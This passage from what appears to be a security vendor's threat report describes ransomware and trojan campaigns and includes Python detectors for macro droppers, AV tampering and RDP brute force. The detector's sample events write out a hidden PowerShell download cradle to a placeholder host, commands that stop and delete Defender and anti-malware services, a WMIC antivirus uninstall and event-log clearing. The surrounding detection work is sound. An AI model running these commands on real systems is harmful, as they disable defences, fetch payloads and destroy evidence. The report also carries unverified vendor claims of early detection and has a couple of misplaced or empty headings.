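# Executable started out of a user's Temp directory (tax.exe saved as mixak.exe).
TEMP_DIR = re.compile(r"\\(appdata\\local\\temp|temp)\\", re.I)
# "sc stop|delete|config <service>": service tampering as AVCrypt performs it.
SC_TAMPER = re.compile(r"\bsc(?:\.exe)?\s+(stop|delete|config)\s+(\S+)", re.I)
# "wmic product ... call uninstall": attempt to remove the registered AV product.
WMIC_UNINSTALL = re.compile(r"\bwmic(?:\.exe)?\b.*\bproduct\b.*\bcall\s+uninstall", re.I)
# "wevtutil cl <log>": clearing Windows event logs after encryption.
LOG_CLEAR = re.compile(r"\bwevtutil(?:\.exe)?\s+cl\b", re.I)


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcEvent) -> List[str]:
    """Return the name of every rule the event trips (empty list if none)."""
    findings = []
    parent, child = basename(ev.parent_image), basename(ev.image)

    # Rule 1: an Office application spawning a script host. A download cradle on
    # the command line upgrades the finding to the macro-dropper pattern.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        if DOWNLOAD_CRADLE.search(ev.command_line):
            findings.append("office-macro-download-cradle")
        else:
            findings.append("office-spawned-script-host")

    # Rule 2: a script host launching an executable from a Temp directory.
    if parent in SCRIPT_HOSTS and TEMP_DIR.search(ev.image):
        findings.append("script-host-launched-exe-from-temp")

    # Rule 3: service control aimed at a security product; "sc stop Spooler" is ignored.
    m = SC_TAMPER.search(ev.command_line)
    if m and m.group(2).lower() in SECURITY_SERVICES:
        findings.append("security-service-" + m.group(1).lower())

    # Rules 4 and 5: AV uninstall through WMIC, and event log clearing.
    if WMIC_UNINSTALL.search(ev.command_line):
        findings.append("wmic-product-uninstall")
    if LOG_CLEAR.search(ev.command_line):
        findings.append("event-log-cleared")
    return findings


def scan(events: List[ProcEvent]) -> List[Tuple[str, str, str, str]]:
    """(timestamp, host, process, finding) for every rule hit across the events."""
    return [(ev.ts, ev.host, basename(ev.image), f)
            for ev in events for f in evaluate(ev)]


# Constructed sample events. Host names, the user and the download host are
# placeholders; the file names follow the campaigns described in the report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
TEMP_EXE = r"C:\Users\alice\AppData\Local\Temp\mixak.exe"
AVCRYPT = r"C:\Users\bob\Downloads\av2018.exe"
SAMPLE_EVENTS = [
    ProcEvent("2018-02-12T09:01:11", "ws-17", WORD, PS,
              r"powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
              r"'http://downloads.example.invalid/tax.exe', $env:TEMP + '\mixak.exe')"),
    ProcEvent("2018-02-12T09:01:13", "ws-17", PS, TEMP_EXE, TEMP_EXE),
    ProcEvent("2018-02-12T09:00:50", "ws-17", r"C:\Windows\explorer.exe", WORD,
              r'"' + WORD + r'" /n taxletter.doc'),   # benign: user opened the document
    ProcEvent("2018-03-21T14:05:02", "ws-42", AVCRYPT,
              r"C:\Windows\System32\sc.exe", "sc stop WinDefend"),
    ProcEvent("2018-03-21T14:05:03", "ws-42", AVCRYPT,
              r"C:\Windows\System32\sc.exe", "sc delete MBAMService"),
    ProcEvent("2018-03-21T14:05:04", "ws-42", AVCRYPT, r"C:\Windows\System32\wbem\WMIC.exe",
              "wmic product where \"name like '%ExampleAV%'\" call uninstall"),
    ProcEvent("2018-03-21T14:09:30", "ws-42", AVCRYPT,
              r"C:\Windows\System32\wevtutil.exe", "wevtutil cl System"),
    ProcEvent("2018-03-21T14:10:00", "ws-42", r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\sc.exe", "sc stop Spooler"),   # benign admin action
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(*hit)
```

Rule 1 on its own is the high-value signal for the tax-lure and “Resume.doc” campaigns, since Word has no business starting PowerShell; rules 3 to 5 are noisy individually and are best correlated by parent process and time window, as the AVCrypt sample does them in quick succession.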

How Does It Propagate?

The malware does not contain the necessary code to self-propagate.

The most common attack vector for most ransomware is social engineering, either as malicious attachments or downloads performed by malicious documents.

When/How Did BluVector Detect It?

Two samples are publicly available and BluVector’s patented Machine Learning Engine detected both. Regression testing has shown both samples would have been detected 5 months prior to their release.


RANSOMWARE:BitPaymer/FriedEx

What Is It?

Researchers at legacy anti-virus vendor ESET have published findings that show strong evidence that the authors of the Dridex banking trojan are also responsible for writing the code for the BitPaymer ransomware. Owing to the connections they found with Dridex, ESET refers to this malware as FriedEx.

The Dridex banking trojan has been seen in the wild since 2014 and since its initial release has been significantly updated and improved, becoming one of the most sophisticated and successful banking trojans.

The BitPaymer/FriedEx ransomware was first seen in July 2017 and received significant media coverage when it was responsible for infecting several National Health Service hospitals in Scotland during August 2017. Much like the recently discussed SamSam ransomware, BitPaymer/FriedEx tends to target higher-profile companies and entities, rather than home users, and usually uses brute force Remote Desktop attacks to initially infect systems.

Researchers showed screenshots that appear to come from the Hex-Rays decompiler tool, showing almost identical code in key areas of Dridex and BitPaymer/FriedEx functions. There were also commonalities in the compiler information and compiler timestamps. Their findings make a strong case for the same authors being behind both families of malware. It appears the authors saw an opportunity to take their existing Dridex codebase and modify it as necessary to create a ransomware revenue stream for themselves.

How Does It Propagate?

Similar to the SamSam ransomware, BitPaymer/FriedEx spreads by attackers manually brute forcing Remote Desktop Protocol (RDP) servers, which then gives them access to devices within the networks. Again, best practice dictates that RDP servers should not be accessible from the internet.

When/How Did BluVector Detect It?

BluVector’s patented machine learning malware detection engine detects the BitPaymer/FriedEx ransomware as malicious. Regression testing on samples has shown the ransomware would have been detected by BluVector 29 months prior to its release.


RANSOMWARE:GlobeImposter & GandCrab

What Is It?

With all the focus cryptocurrency mining is currently receiving, both from the press and attackers looking for a more lucrative revenue stream, it is prudent not to underestimate the threat that ransomware still poses.

Take the case of the Colorado Department of Transport (DOT). On February 21, 2018, the staff discovered that all employee machines running Windows were infected with what was later determined to be SamSam ransomware. This forced Colorado DOT to take over 2,000 machines offline, literally sending employees back to pen and paper for their work activities.

While the DOT had backups of the encrypted data, restoring the data is a time-consuming process. So much so that it had to work out how to pay employees without fully restored systems. By March 1, approximately 20% of machines were back online, consisting mainly of HR and payroll machines that were given recovery priority. They were promptly taken back offline after another variant of SamSam infected these systems.

A SANS Internet Storm Center (ISC) Diary post by handler Brad Duncan described a large malicious spam campaign resulting in ransomware infection. He found this of note, as it was one of the few major ransomware malicious spam campaigns he had seen so far in 2018. The majority of campaigns related to cryptocurrency mining and trojans. The specifics of this campaign aren’t particularly novel: an attached Word document contained a malicious macro. If the recipient is successfully socially engineered to allow the macro to run, it results in a Powershell script that retrieves and executes the ransomware from an external site. All of the attachments were named “Resume.doc” (with a space as the first character), however, each sample had a unique file hash. The attackers also varied the email’s from address, email subject, email headers and email body text in an attempt to avoid detection. The resulting ransomware were determined to be variants of GlobeImposter and GandCrab.

Ransomware may not currently be the cause du jour of IT Security, however, as these two examples demonstrate, this does not mean that the threat ransomware poses to corporate environments has diminished.

How Does It Propagate?

None of the malware discussed here self-propagates.

Once again, these attacks utilize social engineering to be successful on an infected end user’s machine.

When/How Did BluVector Detect It?

BluVector’s patented Machine Learning Engine detects both the malicious Word documents and ransomware described in the ISC article. Regression testing on the 23 malicious Word document samples showed that they would have all been detected by BluVector 49 months prior to their release. One of the three samples of ransomware would have been detected 15 months prior to its release, with the other two detected 51 months prior.

So far, no specifics on the SamSam variants that infected Colorado DOT machines are available, therefore they cannot be tested against BluVector. However, previous testing on other SamSam variants has shown strong detection results, with an average detection of 12 months prior to their release into the wild.


RANSOMWARE:SamSam

What Is It?

Researchers from Cisco TALOS recently released details of a new variant of the SamSam ransomware, which has affected organizations in several industry verticals, including government, healthcare and ICS.

Media reports have advised various healthcare organizations have been affected in recent days, including MedStar, a non-profit group that manages 10 hospitals in the Baltimore and Washington, DC area, Chicago-based AllScripts and Hancock Health Hospital, as well as Adams Memorial Hospital in Indiana. The government municipality of Farmington, New Mexico has also been impacted.

The initial infection vector has not yet been determined, though it is believed to be consistent with previous SamSam variants, where the attackers manually install the ransomware after compromising the corporate network and moving laterally to identify which business critical servers would make the best targets.

The ransomware consists of two components, a loader and an encrypted payload, both delivered as .NET executables. By design, the attackers must manually activate the ransomware using a randomly generated encryption key. SamSam is not a mass market ransomware such as WannaCry, but it is designed to be deployed on high-value targets.

Researchers have determined at least one Bitcoin wallet is being used to collect ransom payments. Currently this wallet has collected 30.4 Bitcoin, which at the time of writing is worth approximately US$270K.

How Does It Propagate?

Unlike many other strains of ransomware, SamSam does not self-propagate.

Researchers have not yet determined with certainty the initial infection vector which then allowed the attackers to install the SamSam ransomware. However, they believe it may be compromised RDP and VNC servers that gave the attackers their first foothold into entering corporate networks. This is another reminder that a determined attacker will find any weakness in your perimeter defense. Best practice dictates that RDP and VNC servers should not be accessible from the internet.
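Both BitPaymer/FriedEx and SamSam are described above as being planted by attackers who brute force Remote Desktop to get their first foothold, which leaves a distinctive trace in the Windows Security log: a burst of failed logons from one source, then a success. The following Python is an added example, not BluVector's or the cited researchers' code; the log line format is a constructed simplification of events 4625 and 4624, the addresses come from documentation ranges, and the inclusion of logon type 3 for NLA-protected RDP is an assumption.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed, simplified rendering of Windows Security logon events (not a real
# export). EventID 4625 = failed logon, 4624 = successful logon; LogonType 10 =
# RemoteInteractive, i.e. RDP. The IPs are documentation ranges, the users made up.
SAMPLE_LOG = """\
2018-02-20T03:12:01Z EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.45
2018-02-20T03:12:04Z EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.45
2018-02-20T03:12:07Z EventID=4625 LogonType=10 TargetUser=admin SourceIP=203.0.113.45
2018-02-20T03:12:10Z EventID=4625 LogonType=10 TargetUser=backup SourceIP=203.0.113.45
2018-02-20T03:12:13Z EventID=4625 LogonType=10 TargetUser=scanner SourceIP=203.0.113.45
2018-02-20T03:14:20Z EventID=4625 LogonType=10 TargetUser=jsmith SourceIP=198.51.100.7
2018-02-20T03:14:35Z EventID=4624 LogonType=10 TargetUser=jsmith SourceIP=198.51.100.7
2018-02-20T03:15:02Z EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.45
2018-02-20T03:15:40Z EventID=4624 LogonType=10 TargetUser=backup SourceIP=203.0.113.45
2018-02-20T03:20:00Z EventID=4625 LogonType=10 TargetUser=svc SourceIP=192.0.2.9
2018-02-20T03:31:00Z EventID=4625 LogonType=10 TargetUser=svc SourceIP=192.0.2.9
2018-02-20T03:42:00Z EventID=4625 LogonType=10 TargetUser=svc SourceIP=192.0.2.9
2018-02-20T03:53:00Z EventID=4625 LogonType=10 TargetUser=svc SourceIP=192.0.2.9
2018-02-20T04:04:00Z EventID=4625 LogonType=10 TargetUser=svc SourceIP=192.0.2.9
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUser=(?P<user>\S+) SourceIP=(?P<ip>\S+)$")

# 10 is the interactive RDP logon type. 3 (network) is included on the assumption
# that RDP behind Network Level Authentication records its failures that way.
RDP_LOGON_TYPES = {10, 3}


def parse_events(text: str) -> List[Dict]:
    """Parse the constructed log format into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": int(m.group("eid")),
            "logon_type": int(m.group("lt")),
            "user": m.group("user"),
            "ip": m.group("ip"),
        })
    return events


def detect_rdp_bruteforce(events: List[Dict], threshold: int = 5,
                          window: timedelta = timedelta(minutes=5)) -> List[Dict]:
    """Flag a source IP whose RDP failures within `window` reach `threshold`, and
    escalate if the same source later logs on successfully (brute force followed
    by a manual foothold, as described for SamSam and BitPaymer/FriedEx)."""
    failures = defaultdict(deque)   # source IP -> timestamps of recent failures
    flagged = set()                 # IPs already reported, to avoid duplicate alerts
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["logon_type"] not in RDP_LOGON_TYPES:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["event_id"] == 4625:
            q = failures[ip]
            q.append(ts)
            while q and ts - q[0] > window:     # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"kind": "rdp-bruteforce", "ip": ip,
                               "at": ts.isoformat(), "failures": len(q)})
        elif ev["event_id"] == 4624 and ip in flagged:
            alerts.append({"kind": "rdp-bruteforce-success", "ip": ip,
                           "at": ts.isoformat(), "user": ev["user"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(parse_events(SAMPLE_LOG)):
        print(alert)
```

The slow source 192.0.2.9 stays below the threshold because its failures are spread wider than the window; a low-and-slow sweep needs a longer window or a count of distinct target accounts per source, and an RDP server that is not reachable from the internet at all removes the problem.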

When/How Did BluVector Detect It?

BluVector’s patented machine learning malware detection engine detects SamSam ransomware as malicious. Regression testing on several samples has shown they would have been detected by BluVector an average of 12 months prior to their release.


Notable Q4 2017 Threats


TROJAN:ExpensiveWall

What Is It?

Another strain of Android malware, dubbed ExpensiveWall, was discovered in over 50 apps on the Google Play Store. These infected apps were downloaded at least 1 million times and possibly as many as 4.4 million times, with the potential for up to 21.1 million infections.

The malware makes use of packing, a common technique in Windows malware which encrypts the malicious code, in order to defeat Google Play Store’s own malware detection.

Once installed and granted the requested privileges, it silently registers the infected users for premium services and sends premium SMS messages, charging their accounts.

How Does It Propagate?

More than 50 apps in the Google Play Store were infected with ExpensiveWall malware. While Google Play Store quickly removed the apps from availability, Android users with those apps may still risk infection.

When/How Did BluVector Detect It?

A number of Android apps infected with ExpensiveWall were tested and all were identified as malicious by BluVector’s machine learning malware detection engine. Regression testing has shown this trojan would have been detected by BluVector since November 2016. Note: BluVector would only detect the malware if the mobile device was connected to a corporate network monitored by a BluVector appliance.

TROJAN:Hancitor

What Is It?

The Hancitor botnet has previously targeted corporations in the tech, biotech and infrastructure industry verticals.

In this case, a malicious spam email claiming to be an invoice from Advanced Maintenance contains links which, if clicked, result in the download of a Word document containing malicious macros. If the end-user allows these macros to run, a malicious executable is extracted and executed.

This malicious executable is capable of downloading other malware, including ransomware and data-stealing malware.

How Does It Propagate?

The malware is spread using a spam campaign which needs to convince the user to click on a link in order to download the malicious Word document, open the document and allow macros to execute. As always, end-user education is a critical component of securing a corporate environment.

When/How Did BluVector Detect It?

Both the malicious Word document and the extracted executable are identified as malicious by BluVector’s machine learning malware detection engine. Regression testing has shown the Word document would have been detected by BluVector 43 months in advance and the executable 35 months in advance.


TROJAN:IcedID

What Is It?

Recently security researchers released the results of their research into a new banking trojan dubbed IcedID, first seen in the wild in September 2017.

The current versions of IcedID are able to target banks, payment card and mobile service providers, payroll portals, as well as webmail and e-commerce sites.

In order to steal financial data and user credentials, the malware performs both redirection attacks – where it creates a local proxy in order to silently redirect users to fake, cloned versions of their legitimate financial provider’s websites – and web injection attacks – where it adds extra fields into legitimate webpages in order to obtain additional user data. Previously, only the Dridex banking trojan utilized both techniques; generally one or the other is used.

The research found that the IcedID trojan does not appear to reuse code from other banking trojans, indicating the attackers are potentially a new group.

How Does It Propagate?

The IcedID malware has been found to have been downloaded and installed on systems as a secondary infection, by the Emotet trojan. This allows the attackers to only install IcedID on systems located in the US, Canada and the UK, and recovered configuration files show financial institutions in these countries are the ones currently being targeted.

This malware also has the ability to propagate via the internal network, and researchers have also observed it infecting a terminal server.

When/How Did BluVector Detect It?

BluVector’s patented machine learning engine detects the IcedID malware as malicious. Regression testing on four samples has shown the files would have been detected by BluVector between 36 and 46 months prior to their release.


TROJAN:Marcher

What Is It?

The Marcher malware is part of a three-way attack aimed at customers of Austrian banks.

The first component of this attack is a phishing email containing a link, utilizing the bit.ly URL redirection service. The link takes the user to a phishing site that duplicates a bank’s legitimate online banking login page in an attempt to steal the user’s credentials. After the user enters his or her credentials, the fake site then also requests the user’s email address and phone number.

At this point, the second phase of the attack begins. The user is presented with a webpage advising that he or she does not have the bank’s required “Security App” and providing another bit.ly link and a QR code in order to download the app. There are even instructions on accepting the Android system permissions requested by the app. The app is, of course, a variant of the Marcher banking trojan.

The third aspect of the attack is that, in addition to stealing the user’s online banking credentials, the Marcher trojan will also request credit card information be entered when certain apps are opened, such as the Google Play Store. The trojan also attempts to obtain other supporting information, such as the user’s date of birth, address, billing phone number and password by presenting fake Verified by Visa and MasterCard SecureCode screens.

How Does It Propagate?

Previous variants of Marcher malware have been distributed via text messages. In this case, propagation occurs by successfully socially engineering a user to install the malware, believing it to be an app required by his or her bank. This will only occur if the user has previously been socially engineered to click on the link in a phishing email and enter his or her credentials into a fake online banking site.

Attackers continue to use social engineering to exploit the most vulnerable component of any computer system: the user. They do so because this attack vector is reliably successful. User education is a critical part of securing any corporate network. With Android devices becoming more commonplace in enterprise networks due to BYOD policies, they can create a new threat vector for malware infections if not monitored and managed correctly.

When/How Did BluVector Detect It?

BluVector’s patented machine learning malware detection engine detects the Marcher Android app as malicious. Regression testing has shown the file would have been detected by BluVector 11 months prior to its release. Note: BluVector would only detect the malware if the mobile device was connected to a corporate network monitored by a BluVector appliance.


TROJAN:Orcus Rat



TROJAN:Scarab

What Is It?

In the days leading up to the U.S. Thanksgiving break, a significant malicious spam campaign was launched to spread a new piece of ransomware known as Scarab. The timing was clearly deliberate in its social engineering approach as many people had already started their Thanksgiving break. It was designed to hit the inboxes of people in a rush to finish their work and start their holiday break, thus exercising less care and attention to what they were clicking.

It is reported that in the first four hours of this campaign, over 12.5 million spam emails were sent. The subject of the emails used a common lure of “Scanned from [printer name],” where “printer name” was Epson, HP, Lexmark or Canon. The campaign utilized the large Necurs botnet to send the spam emails from infected hosts.

Attached to the email was a Visual Basic Script compressed inside a 7-Zip file. Executing the Visual Basic Script resulted in downloading and executing the Scarab ransomware.

Scarab adds the extension “[[email protected]].scarab” to all files it encrypts, including data files as well as document and image file types.

How Does It Propagate?

The Scarab ransomware does not self-propagate, nor does it spread via an internal network.

It spreads via malicious spam, requiring users to be socially engineered to open the attached 7-Zip file and execute the Visual Basic Script in order to be infected. Once again, this highlights the importance of user education in securing the corporate IT environment.

When/How Did BluVector Detect It?

BluVector’s patented machine learning malware detection engine detects the Scarab malware as malicious. Regression testing on the sample has shown the ransomware would have been detected by BluVector 11 months prior to its release.


RANSOMWARE:Bad Rabbit

What Is It?

On Oct. 24, 2017, a new strain of ransomware, referred to as Bad Rabbit, was used in a widespread campaign that reportedly caused issues for enterprises and infrastructure such as airports and train stations across Eastern Europe, Turkey and Germany.

Analysis of the malware code found similarities with previous large-scale ransomware attacks such as NotPetya and Petya. However, this malware does not use the EternalBlue exploit to propagate. Additionally, this malware appears not to be destructive in the way NotPetya was; it is purely ransomware.

A number of websites were compromised in Eastern Europe and Turkey and redirected users to a site serving a drive-by download of a fake Adobe Flash Player update. The drive-by download server was taken offline after approximately 6 hours.

The ransomware requested an initial ransom of 0.05 Bitcoin (US$274.86, as of the writing of this report) which increases the longer the ransom goes unpaid.

As is common with recent ransomware, it encrypts the Master Boot Record on the victim’s hard drive, rendering it unusable until the ransom is paid, after first encrypting files with the following extensions:

.3ds, .7z, .accdb, .ai, .asm, .asp, .aspx, .avhd, .back, .bak, .bmp, .brw, .c, .cab, .cc, .cer, .cfg, .conf, .cpp, .crt, .cs, .ctl, .cxx, .dbf, .der, .dib, .disk, .djvu, .doc, .docx, .dwg, .eml, .fdb, .gz, .h, .hdd, .hpp, .hxx, .iso, .java, .jfif, .jpe, .jpeg, .jpg, .js, .kdbx, .key, .mail, .mdb, .msg, .nrg, .odc, .odf, .odg, .odi, .odm, .odp, .ods, .odt, .ora, .ost, .ova, .ovf, .p12, .p7b, .p7c, .pdf, .pem, .pfx, .php, .pmf, .png, .ppt, .pptx, .ps1, .pst, .pvi, .py, .pyc, .pyw, .qcow, .qcow2, .rar, .rb, .rtf, .scm, .sln, .sql, .tar, .tib, .tif, .tiff, .vb, .vbox, .vbs, .vcb, .vdi, .vfd, .vhd, .vhdx, .vmc, .vmdk, .vmsd, .vmtm, .vmx, .vsdx, .vsv, .work, .xls, .xlsx, .xml, .xvd, .zip

How Does It Propagate?

Bad Rabbit spreads via compromised websites redirecting to a drive-by download of the malware, which claims to be an Adobe Flash Player update.

This malware also contains a list of weak passwords which it can utilize to propagate over the network. It does not utilize any exploits.

As this attack initially requires a user to execute the fake Adobe Flash Player update, end-user education is always a critical component of securing a corporate environment.

When/How Did BluVector Detect It?

BluVector’s machine learning malware detection engine detects the fake Adobe Flash Player update as malicious. Regression testing has shown the file would have been detected by BluVector 10 months prior to the malware’s release.


What Is It?

Various news articles have described a new strain of Android ransomware known as DoubleLocker. The malware is so named as it not only encrypts data files on an infected smartphone, it also alters the PIN of the device. Files are encrypted using a correct implementation of the AES algorithm and have the file extension “.cryeye” added to encrypted filenames.

If the ransom of 0.013 Bitcoin is paid within the permitted two-hour time frame, the malicious actors can reset the device’s PIN and decryptthe files.

How Does It Propagate?

The malware is said to be spreading mostly via compromised websites offering a fake Adobe Flash Player download.

When/How Did BluVector Detect It?

The Android APK file is identified as malicious by BluVector’s machine learning malware detection engine. Regression testing has shown this file would have been detected by BluVector 10 months prior to it being released. Note: BluVector would only detect the malware if the Android device was connected to a corporate network monitored by a BluVector appliance.

RANSOMWARE:DoubleLocker Android


About BluVector

www.bluvector.io 571.565.2100

GET AHEAD OF THE THREAT

BluVector is revolutionizing network security with state-of-the-art AI, sensing and responding to the world's most sophisticated threats in real time. With the unmatched advantage of 8 years of work with the US Intel Community and their threat data, only BluVector has the proven ability to protect against emerging threats on average 13 months in advance.

Stop waiting for breaches to happen.

GET AHEAD OF THE THREAT.

BLUVECTOR MLE

BluVector MLE is a patented supervised Machine Learning Engine that was developed within the defense and intelligence community to accurately detect zero-day and polymorphic malware in real time. Unlike unsupervised machine learning, which is leveraged by most security vendors today, BluVector MLE algorithms were pre-trained to immediately identify malicious content embedded within common file formats like Office documents, archives, executables, .pdf, and system updates. The result: 99.1%+ detection accuracy upon installation.

BLUVECTOR SCE

BluVector SCE is the security market’s first analytic specifically designed to detect fileless malware as it traverses the network. By emulating how the malware will behave when it is executed, the Speculative Code Execution engine determines, at line speed, what an input can do if executed and to what extent these behaviors might initiate a security breach. By covering all potential execution chains and focusing on malicious capacity rather than malicious behavior, the analytic technology vastly reduces the number of execution environments and the quantity of analytic results that must be investigated. The result: 99%+ detection accuracy of this otherwise “invisible” threat.
